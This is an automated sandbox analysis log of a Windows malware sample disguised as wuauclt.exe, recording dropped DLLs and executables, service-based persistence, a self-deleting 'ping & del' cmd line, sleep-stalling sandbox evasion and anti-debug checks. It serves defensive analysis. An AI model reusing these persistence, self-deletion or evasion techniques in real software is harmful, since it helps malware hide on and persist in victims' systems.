      Source: C:\Windows\SysWOW64\dllhostex.exeMutant created: \BaseNamedObjects\{B8A7AE22-7F59-CDE5-71F9C2A}
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6464:120:WilError_01
      Source: C:\Users\user\Desktop\wuauclt.exeMutant created: \Sessions\1\BaseNamedObjects\{ED29R9-8ED1-C760-7D789N}
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4768:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_01
      Source: C:\Windows\SysWOW64\svchost.exeMutant created: \BaseNamedObjects\{E2077B81F-2A96-43E8-B9F522B}
      Source: C:\Windows\SysWOW64\svchost.exeMutant created: \BaseNamedObjects\{F5175396-40C2-0218-278D6EE}
      Source: C:\Windows\SysWOW64\svchost.exeMutant created: \BaseNamedObjects\{E2044B81F-2A96-43E8-B9F522B}
      Source: C:\Windows\SysWOW64\svchost.exeMutant created: \BaseNamedObjects\{E2066B81F-2A96-43E8-B9F522B}
      Source: C:\Windows\SysWOW64\svchost.exeMutant created: \BaseNamedObjects\{CE9SCB-B92-FC8-A6FECD}
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6472:120:WilError_01
      Source: dllhostex.exeString found in binary or memory: Previously-added IP address had counter of zero
      Source: dllhostex.exeString found in binary or memory: Failed to find previously-added IP address
      Source: dllhostex.exeString found in binary or memory: Failed to find previously-added IP address
      Source: dllhostex.exeString found in binary or memory: Previously-added IP address had counter of zero
      Source: C:\Users\user\Desktop\wuauclt.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\wuauclt.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\dllhostex.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\dllhostex.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: wuauclt.exeStatic file information: File size 7154917 > 1048576
      Source: wuauclt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: wuauclt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: wuauclt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: wuauclt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: wuauclt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: wuauclt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: wuauclt.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: wuauclt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: wuauclt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: wuauclt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: wuauclt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: wuauclt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: wuauclt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_00257BA6 push ecx; ret 0_2_00257BB9
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_6FD565C6 push ecx; ret 2_2_6FD565D9
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B1B17 push ebx; ret 2_2_039B1B18
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B215E push ecx; ret 2_2_039B2171
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACFED push dword ptr [esp+ecx-75h]; iretd 2_2_039ACFF1
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03998DC6 push ecx; ret 2_2_03998DD9
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_00989B4D push esi; ret 15_2_00989B56
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_00971686 push ecx; ret 15_2_00971699
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0134DB50 push ecx; mov dword ptr [esp], 00000001h16_2_0134DB51
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0134DBC0 push ecx; mov dword ptr [esp], 00000000h16_2_0134DBC1
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_01354606 push ecx; ret 16_2_01354619
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FC9B4D push esi; ret 21_2_02FC9B56
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FB1686 push ecx; ret 21_2_02FB1699
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_0288AB98 pushad ; retf 23_2_0288AB99
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_02889B4D push esi; ret 23_2_02889B56
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_02871686 push ecx; ret 23_2_02871699
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E2AB98 pushad ; retf 24_2_02E2AB99
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E29B4D push esi; ret 24_2_02E29B56
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E11686 push ecx; ret 24_2_02E11699
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_6FD54D40 VirtualAlloc,LoadLibraryA,GetProcAddress,VirtualProtect,2_2_6FD54D40

      Persistence and Installation Behavior

      barindex
      Drops executables to the windows directory (C:\Windows) and starts them
      Source: C:\Windows\SysWOW64\svchost.exeExecutable created and started: C:\Windows\SysWOW64\WUDHostServices.exe
      Source: C:\Windows\SysWOW64\svchost.exeExecutable created and started: C:\Windows\SysWOW64\dllhostex.exeJump to behavior
      Creates a Windows Service pointing to an executable in C:\Windows
      Source: C:\Users\user\Desktop\wuauclt.exeKey value created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\FunctionProtocolHost\Parameters ServiceDll C:\Windows\system32\FunctionProtocolHost.dllJump to behavior
      Source: C:\Windows\SysWOW64\ctfmon.exeFile created: C:\Windows\NetworkDistribution\cnli-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\wuauclt.exeFile created: C:\Windows\SysWOW64\FunctionProtocolHost.dllJump to dropped file
      Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\SysWOW64\WUDHostServices.exeJump to dropped file
      Source: C:\Windows\SysWOW64\ctfmon.exeFile created: C:\Windows\NetworkDistribution\adfw.dllJump to dropped file
      Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\SysWOW64\dllhostex.exeJump to dropped file
      Source: C:\Windows\SysWOW64\ctfmon.exeFile created: C:\Windows\NetworkDistribution\adfw-2.dllJump to dropped file
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile created: C:\Windows\NetworkDistribution\cnli-1.dllJump to dropped file
      Source: C:\Windows\SysWOW64\ctfmon.exeFile created: C:\Windows\NetworkDistribution\cnli-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\wuauclt.exeFile created: C:\Windows\SysWOW64\FunctionProtocolHost.dllJump to dropped file
      Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\SysWOW64\WUDHostServices.exeJump to dropped file
      Source: C:\Windows\SysWOW64\ctfmon.exeFile created: C:\Windows\NetworkDistribution\adfw.dllJump to dropped file
      Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\SysWOW64\dllhostex.exeJump to dropped file
      Source: C:\Windows\SysWOW64\ctfmon.exeFile created: C:\Windows\NetworkDistribution\adfw-2.dllJump to dropped file
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile created: C:\Windows\NetworkDistribution\cnli-1.dllJump to dropped file

      Boot Survival

      barindex
      Uses schtasks.exe or at.exe to add and modify task schedules
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /End /TN "\Microsoft\Windows\UPnP\RpcPolicyHost"
      Source: C:\Windows\SysWOW64\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\FunctionProtocolHostJump to behavior
      Source: C:\Users\user\Desktop\wuauclt.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\FunctionProtocolHostJump to behavior
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_00257040 OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_00257040

      Hooking and other Techniques for Hiding and Protection

      barindex
      Self deletion via cmd delete
      Source: C:\Users\user\Desktop\wuauclt.exeProcess created: cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe"
      Source: C:\Users\user\Desktop\wuauclt.exeProcess created: cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0399A82A GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0399A82A
      Source: C:\Windows\SysWOW64\dllhostex.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Found stalling execution ending in API Sleep call
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeStalling execution: Execution stalls by calling Sleep
      Source: C:\Windows\SysWOW64\dllhost.exeStalling execution: Execution stalls by calling Sleep
      Source: C:\Windows\SysWOW64\ctfmon.exeStalling execution: Execution stalls by calling Sleep
      Uses ping.exe to sleep
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 5
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 5 Jump to behavior
      Contains functionality to detect sleep reduction / modifications
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_009693E015_2_009693E0
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FA93E021_2_02FA93E0
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_028693E023_2_028693E0
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E093E024_2_02E093E0
      Source: C:\Windows\SysWOW64\dllhostex.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5224Thread sleep count: 44 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5252Thread sleep time: -115000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5764Thread sleep time: -360000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5716Thread sleep time: -450000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5648Thread sleep time: -600000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 1572Thread sleep time: -120000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5628Thread sleep time: -300000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5628Thread sleep time: -3600000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5648Thread sleep time: -7200000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5648Thread sleep time: -14400000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 1572Thread sleep time: -9000000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5588Thread sleep time: -45000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5588Thread sleep time: -80000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5624Thread sleep count: 55 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\ctfmon.exe TID: 4700Thread sleep time: -360000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\ctfmon.exe TID: 3532Thread sleep time: -5400000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\ctfmon.exe TID: 3532Thread sleep time: -900000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\dllhostex.exe TID: 4204Thread sleep count: 621 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\dllhostex.exe TID: 4204Thread sleep time: -124200s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 2204Thread sleep time: -360000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 6952Thread sleep time: -3600000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 6952Thread sleep time: -900000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\dllhost.exe TID: 5172Thread sleep time: -420000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\dllhost.exe TID: 6624Thread sleep time: -3600000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\dllhost.exe TID: 6624Thread sleep time: -900000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\dllhost.exe TID: 1928Thread sleep time: -480000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\dllhost.exe TID: 5972Thread sleep time: -3600000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\dllhost.exe TID: 5972Thread sleep time: -900000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 2792Thread sleep time: -480000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 6836Thread sleep time: -6300000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5304Thread sleep time: -660000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 4872Thread sleep time: -6300000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\ctfmon.exe TID: 5752Thread sleep time: -480000s >= -30000s
      Source: C:\Windows\SysWOW64\ctfmon.exe TID: 5780Thread sleep time: -5400000s >= -30000s
      Source: C:\Windows\SysWOW64\ctfmon.exe TID: 5780Thread sleep time: -900000s >= -30000s
      Source: C:\Windows\SysWOW64\ctfmon.exe TID: 1548Thread sleep time: -600000s >= -30000s
      Source: C:\Windows\SysWOW64\ctfmon.exe TID: 6232Thread sleep time: -5400000s >= -30000s
      Source: C:\Windows\SysWOW64\ctfmon.exe TID: 6232Thread sleep time: -900000s >= -30000s
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5892Thread sleep time: -600000s >= -30000s
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5956Thread sleep time: -5400000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 7192Thread sleep time: -90000s >= -30000s
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 300000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 1800000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 1800000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 1800000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 1800000Jump to behavior
      Source: C:\Windows\SysWOW64\ctfmon.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\ctfmon.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\dllhost.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\dllhost.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\dllhost.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\dllhost.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\ctfmon.exeThread delayed: delay time: 900000
      Source: C:\Windows\SysWOW64\ctfmon.exeThread delayed: delay time: 900000
      Source: C:\Windows\SysWOW64\ctfmon.exeThread delayed: delay time: 900000
      Source: C:\Windows\SysWOW64\ctfmon.exeThread delayed: delay time: 900000
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 900000
      Source: C:\Windows\SysWOW64\dllhostex.exeWindow / User API: threadDelayed 621Jump to behavior
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_009693E015_2_009693E0
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FA93E021_2_02FA93E0
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E093E024_2_02E093E0
      Source: C:\Windows\SysWOW64\ctfmon.exeDropped PE file which has not been started: C:\Windows\NetworkDistribution\cnli-0.dllJump to dropped file
      Source: C:\Windows\SysWOW64\ctfmon.exeDropped PE file which has not been started: C:\Windows\NetworkDistribution\adfw.dllJump to dropped file
      Source: C:\Windows\SysWOW64\ctfmon.exeDropped PE file which has not been started: C:\Windows\NetworkDistribution\adfw-2.dllJump to dropped file
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeDropped PE file which has not been started: C:\Windows\NetworkDistribution\cnli-1.dllJump to dropped file
      Source: C:\Windows\SysWOW64\dllhost.exeEvaded block: after key decision
      Source: C:\Windows\SysWOW64\dllhost.exeEvaded block: after key decision
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: WSAStartup,GetAdaptersInfo,0_2_00255F70
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 30000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 30000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 120000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 300000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 1800000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 1800000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 1800000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 1800000Jump to behavior
      Source: C:\Windows\SysWOW64\ctfmon.exeThread delayed: delay time: 60000Jump to behavior
      Source: C:\Windows\SysWOW64\ctfmon.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\ctfmon.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeThread delayed: delay time: 60000Jump to behavior
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\dllhost.exeThread delayed: delay time: 60000Jump to behavior
      Source: C:\Windows\SysWOW64\dllhost.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\dllhost.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\dllhost.exeThread delayed: delay time: 60000Jump to behavior
      Source: C:\Windows\SysWOW64\dllhost.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\dllhost.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 60000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 60000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\ctfmon.exeThread delayed: delay time: 60000
      Source: C:\Windows\SysWOW64\ctfmon.exeThread delayed: delay time: 900000
      Source: C:\Windows\SysWOW64\ctfmon.exeThread delayed: delay time: 900000
      Source: C:\Windows\SysWOW64\ctfmon.exeThread delayed: delay time: 60000
      Source: C:\Windows\SysWOW64\ctfmon.exeThread delayed: delay time: 900000
      Source: C:\Windows\SysWOW64\ctfmon.exeThread delayed: delay time: 900000
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 60000
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 900000
      Source: SearchProtocolHost.exe, 00000015.00000002.723695954.00000000033F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
      Source: ctfmon.exe, 0000000F.00000002.705657892.0000000000E07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03997780 GetSystemInfo,2_2_03997780
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_0025F89F FindFirstFileExA,0_2_0025F89F
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_0097B9D3 FindFirstFileExA,15_2_0097B9D3
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_0096AA40 wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,FindNextFileW,FindClose,15_2_0096AA40
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FAAA40 wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,FindNextFileW,FindClose,21_2_02FAAA40
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FBB9D3 FindFirstFileExA,21_2_02FBB9D3
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_0286AA40 wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,FindNextFileW,FindClose,23_2_0286AA40
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_0287B9D3 FindFirstFileExA,23_2_0287B9D3
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E0AA40 wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,FindNextFileW,FindClose,24_2_02E0AA40
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E1B9D3 FindFirstFileExA,24_2_02E1B9D3
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_6FD54D40 VirtualAlloc,LoadLibraryA,GetProcAddress,VirtualProtect,2_2_6FD54D40
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_0025C90E mov eax, dword ptr fs:[00000030h]0_2_0025C90E
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_6FD595B8 mov eax, dword ptr fs:[00000030h]2_2_6FD595B8
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039A258D mov eax, dword ptr fs:[00000030h]2_2_039A258D
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_0097657D mov eax, dword ptr fs:[00000030h]15_2_0097657D
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_01369F60 mov eax, dword ptr fs:[00000030h]16_2_01369F60
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_01369FA5 mov eax, dword ptr fs:[00000030h]16_2_01369FA5
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0136324D mov eax, dword ptr fs:[00000030h]16_2_0136324D
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FB657D mov eax, dword ptr fs:[00000030h]21_2_02FB657D
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_0287657D mov eax, dword ptr fs:[00000030h]23_2_0287657D
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E1657D mov eax, dword ptr fs:[00000030h]24_2_02E1657D
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_0025B888 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0025B888
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_0026127C GetProcessHeap,0_2_0026127C
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_00257AAE SetUnhandledExceptionFilter,0_2_00257AAE
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_0025B888 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0025B888
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_002570EE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_002570EE
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_00257993 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00257993
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_6FD5A0CA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6FD5A0CA
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_6FD56452 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6FD56452
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_6FD5606B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6FD5606B
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03998A9B DeleteFileA,Sleep,IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_03998A9B
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039987E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_039987E0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039A146B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_039A146B
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_009693E0 FreeConsole,SetUnhandledExceptionFilter,Sleep,Sleep,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,GetTickCount,GetTickCount,GetTickCount,Sleep,GetTickCount,ExitProcess,15_2_009693E0
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_009715D6 SetUnhandledExceptionFilter,15_2_009715D6
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_00975A46 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00975A46
